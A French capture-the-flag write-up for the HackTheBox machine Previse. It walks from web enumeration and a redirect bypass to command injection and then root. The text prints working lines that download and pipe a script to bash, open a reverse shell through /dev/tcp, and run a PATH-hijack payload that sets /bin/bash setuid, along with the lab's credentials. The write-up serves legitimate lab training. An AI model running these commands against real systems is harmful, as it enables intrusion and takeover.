> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/writeups-ctf/hackthebox/linux-easy/previse-hackthebox-writeup.md).

# Compte rendu HackTheBox de Previse

{% embed url="<https://app.hackthebox.com/machines/Previse>" %}

{% hint style="warning" %}
**Compétences :**

* Énumération Web
* Vulnérabilité d'exécution après redirection (EAR) - Contournement des redirections
* Analyse du code source PHP
* Injection de commandes (RCE)
* Fuite d'informations
* Énumération de la base de données
* Cassage de hachages
* Abus du privilège sudoers + détournement du PATH (élévation de privilèges)
  {% endhint %}

## Reconnaissance

**Configuration de l'espace de travail :**

Configurez l'espace de travail en créant trois dossiers pour stocker le contenu important, les exploits et les résultats de reconnaissance Nmap.

<figure><img src="/files/c47c8349f65b70c05a8b517fc69106367cc6906e" alt="" width="563"><figcaption></figcaption></figure>

**Vérification de la connectivité VPN**

Vérifiez la connectivité VPN pour assurer une communication stable avec la machine cible.

<figure><img src="/files/4ace5f66fdb0117e1fdbe56239213871fbc7279b" alt="" width="563"><figcaption></figcaption></figure>

**Découverte des ports ouverts avec Nmap :**

Énumérez les ports ouverts et exportez les résultats dans le fichier "allPorts" du répertoire Nmap :

```bash
nmap -p- --open -sS -n -Pn -vvv --min-rate 5000 10.10.11.104 -oG allPorts
```

<figure><img src="/files/90089a49648e83d0b91edc0697499c5a1b4a55c3" alt=""><figcaption></figcaption></figure>

**Scan des versions des ports avec Nmap 22.80 :**

Utilisez Nmap pour analyser les versions des services et enregistrer la sortie dans le fichier "targeted" :

```bash
nmap -sCV -p22,80 10.10.11.104 -oN targeted
```

<figure><img src="/files/75000461005b6b9f0d82a7480d661b3bd3867918" alt=""><figcaption></figcaption></figure>

### Port 80 - HTTP

Nous trouvons une page de connexion nécessitant un identifiant et un mot de passe.

<figure><img src="/files/69af9b619e7e6529a50286b772d857884e84ecd3" alt=""><figcaption></figcaption></figure>

### **Fuzzing des répertoires et fichiers PHP**

Étant donné la présence d'un fichier PHP, il est probable qu'il y en ait d'autres :

```bash
gobuster dir -u http://10.10.11.104/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100 -x php
```

## **Vulnérabilité EAR (exécution après redirection) - Ignorer les redirections**

Nous trouvons plusieurs pages contenant du contenu mais redirigeant vers la page de connexion.

<figure><img src="/files/79d19fb3623a2dcd5b386611638d938ae98b876a" alt=""><figcaption></figcaption></figure>

Nous interceptons la requête à `nav.php` avec Burp Suite et observons une redirection 302.

<figure><img src="/files/3069e386f0ce5652dc84916455aba80d0a0e8fd6" alt=""><figcaption></figcaption></figure>

En forçant la réponse à `200 OK`, nous allons directement vers la `accounts` page.

<figure><img src="/files/928a58e7e550a0af29ca5a3d96ce6926a3f9378b" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/27db23644db1e0ed26fe7f8490afb882c787b37a" alt=""><figcaption></figcaption></figure>

Nous créons une règle dans Burp Suite pour modifier automatiquement `302 Found` les réponses en `200 OK`.

<figure><img src="/files/3e48805cc39300262f3c97abdef449c781eeb0b2" alt=""><figcaption></figcaption></figure>

Nous créons ensuite un utilisateur `jordan` et nous connectons.

<figure><img src="/files/4f313788b3b3abe1a13d24c560496e49f64fe9d0" alt=""><figcaption></figcaption></figure>

### **Analyse des fichiers récupérés**

Nous téléchargeons un fichier trouvé sur `/files`:

<figure><img src="/files/5faec42cd126af29ead58f717647610a2aca4e6a" alt=""><figcaption></figcaption></figure>

```bash
unzip siteBackup.zip
```

<figure><img src="/files/c1607b0ea2c6ec1026abb2184d1f9cf0b19b00cd" alt=""><figcaption></figcaption></figure>

Nous trouvons plusieurs fichiers PHP et observons que `logs.php` utilise la `exec()` fonction sans aucune validation :

```bash
$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
```

<figure><img src="/files/a4436f12d19e0979229ac3f652dbc63d3e0cbec4" alt=""><figcaption></figcaption></figure>

### **Exploitation d'une injection de commandes (RCE)**

<figure><img src="/files/61b8e25890755f397611606df39d1c32b6823ef8" alt=""><figcaption></figcaption></figure>

Nous interceptons la requête vers `file_logs.php` et injectons une commande via le `delim` paramètre :

<pre class="language-bash"><code class="lang-bash"><strong>delim=comma;curl http://10.10.14.50
</strong></code></pre>

Nous recevons une connexion.

<figure><img src="/files/846bd159cf5127e2ab8cc3b456b48fa1b4534579" alt=""><figcaption></figcaption></figure>

### Shell inversé

Nous créons un `index.html` fichier contenant :

```bash
#!/bin/bash 
bash -i >& /dev/tcp/10.10.14.50/443 0>&1
```

Nous lançons un serveur web Python :

```bash
python3 -m http.server 80
```

Nous écoutons sur notre machine sur le port 443 :

```bash
nc -nlvp 443
```

Nous exécutons la commande suivante pour récupérer le reverse shell :

```bash
;curl http://10.10.14.50  | bash
```

Nous sommes maintenant l'utilisateur `www-data`.

<figure><img src="/files/24db0a88c3eade71d0cb8edd8f055c8b29b74373" alt=""><figcaption></figcaption></figure>

#### **Amélioration du shell**

```bash
script /dev/null -c bash
# Ctrl+Z

stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 44 columns 184
```

### **Élévation de privilèges**

### Pivot vers l'utilisateur m4lwhere

Nous trouvons un fichier contenant des identifiants :

* $user : root
* $passwd : mySQL/\_p\@ssw0rd!:)

<figure><img src="/files/851b4f5e78c58fb16a4d0b021eef2bd71015b989" alt=""><figcaption></figcaption></figure>

Nous nous connectons à la base de données MySQL :

```sql
mysql -u root -p
```

Nous listons les bases de données :

```sql
show databases;
```

Nous trouvons la base `previse`, que nous utilisons :

```sql
use previse;
```

<figure><img src="/files/39e8d67491612891efc9f2032bb02341b697503e" alt=""><figcaption></figcaption></figure>

Nous explorons la `accounts` table :

```sql
show tables;
describe accounts
```

<figure><img src="/files/5266d57e309acc4eb03bd27d2f2241dbde464465" alt=""><figcaption></figcaption></figure>

Nous trouvons :

```sql
select username, password from accounts;
```

* username: m4lwhere
* password: $1$🧂llol$DQpmdvnb7EeuO6UaqRItf.

<figure><img src="/files/ddd4abbf0b3b7088140ad3b7f9743fa91a465552" alt="" width="563"><figcaption></figcaption></figure>

### **Craquage du hachage**

Nous utilisons Hashcat pour le déchiffrer :

```bash
hashcat -a 0 -m 500 hash /usr/share/wordlists/rockyou.txt
```

Mot de passe trouvé :

* password : ilovecody112235!

<figure><img src="/files/92a65f8324052d1f2d19303976791f2d4a4fdaac" alt=""><figcaption></figcaption></figure>

Nous nous connectons en tant que `m4lwhere`.

<figure><img src="/files/def8e280c0af4e77bc33b7cda6718155a5742cab" alt=""><figcaption></figcaption></figure>

### Drapeau user.txt :)

<figure><img src="/files/8d29cddb832a958db09c8bd4a2c12645aa3ddf39" alt="" width="563"><figcaption></figcaption></figure>

### **Détournement du PATH (gzip)**

Nous listons les permissions sudo :

```bash
sudo -l
```

Nous trouvons un script exécutable en tant que root en utilisant `gzip` sans chemin absolu.

<figure><img src="/files/b16b74e035c86b7d57dfd42da88e0a62e34dda1b" alt=""><figcaption></figcaption></figure>

#### **Création d'un binaire malveillant**

Nous créons un fichier malveillant `gzip` fichier dans `/tmp/`:

```bash
chmod 4777 /bin/bash
```

Nous modifions le `PATH` variable à prioriser `/tmp/`:

```bash
export PATH=/tmp/:$PATH
```

<figure><img src="/files/a243bd4072ca55e8f3bdd995c7ccca25a7c8672d" alt=""><figcaption></figcaption></figure>

Nous exécutons le script en tant que root :

```bash
sudo /opt/scripts/access_backup.sh
```

<figure><img src="/files/58185d3ae802fb584b03ce43b4dfd1e331ecaf73" alt=""><figcaption></figcaption></figure>

### Drapeau root.txt :)

<figure><img src="/files/ec1dcc5ab616f0bae3f91ebdd811f6d328dfca9b" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/c842029df7a41b98569597e76d78f6eae885afa1" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/writeups-ctf/hackthebox/linux-easy/previse-hackthebox-writeup.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
